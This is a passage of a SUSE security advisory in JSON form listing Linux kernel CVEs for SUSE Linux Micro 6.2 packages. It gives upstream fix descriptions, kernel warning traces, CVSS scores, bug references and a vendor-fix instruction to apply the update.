"category": "external",
"summary": "SUSE Bug 1256763 for CVE-2025-71118",
"url": "https://bugzilla.suse.com/1256763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71118"
},
{
"cve": "CVE-2025-71119",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71119"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71119",
"url": "https://www.suse.com/security/cve/CVE-2025-71119"
},
{
"category": "external",
"summary": "SUSE Bug 1256730 for CVE-2025-71119",
"url": "https://bugzilla.suse.com/1256730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71119"
},
{
"cve": "CVE-2025-71120",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71120"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf\n\nA zero length gss_token results in pages == 0 and in_token-\u003epages[0]\nis NULL. The code unconditionally evaluates\npage_address(in_token-\u003epages[0]) for the initial memcpy, which can\ndereference NULL even when the copy length is 0. Guard the first\nmemcpy so it only runs when length \u003e 0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71120",
"url": "https://www.suse.com/security/cve/CVE-2025-71120"
},
{
"category": "external",
"summary": "SUSE Bug 1256779 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "external",
"summary": "SUSE Bug 1256780 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71120"
},
{
"cve": "CVE-2025-71123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix string copying in parse_apply_sb_mount_options()\n\nstrscpy_pad() can\u0027t be used to copy a non-NUL-term string into a NUL-term\nstring of possibly bigger size. Commit 0efc5990bca5 (\"string.h: Introduce\nmemtostr() and memtostr_pad()\") provides additional information in that\nregard. So if this happens, the following warning is observed:\n\nstrnlen: detected buffer overflow: 65 byte read of buffer size 64\nWARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nModules linked in:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nCall Trace:\n \u003cTASK\u003e\n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen include/linux/fortify-string.h:235 [inline]\n sized_strscpy include/linux/fortify-string.h:309 [inline]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]\n __ext4_fill_super fs/ext4/super.c:5261 [inline]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [inline]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [inline]\n __do_sys_mount fs/namespace.c:4103 [inline]\n __se_sys_mount fs/namespace.c:4080 [inline]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nSince userspace is expected to provide s_mount_opts field to be at most 63\ncharacters long with the ending byte being NUL-term, use a 64-byte buffer\nwhich matches the size of s_mount_opts, so that strscpy_pad() does its job\nproperly. Return with error if the user still managed to provide a\nnon-NUL-term string here.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71123",
"url": "https://www.suse.com/security/cve/CVE-2025-71123"
},
{
"category": "external",
"summary": "SUSE Bug 1256757 for CVE-2025-71123",
"url": "https://bugzilla.suse.com/1256757"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
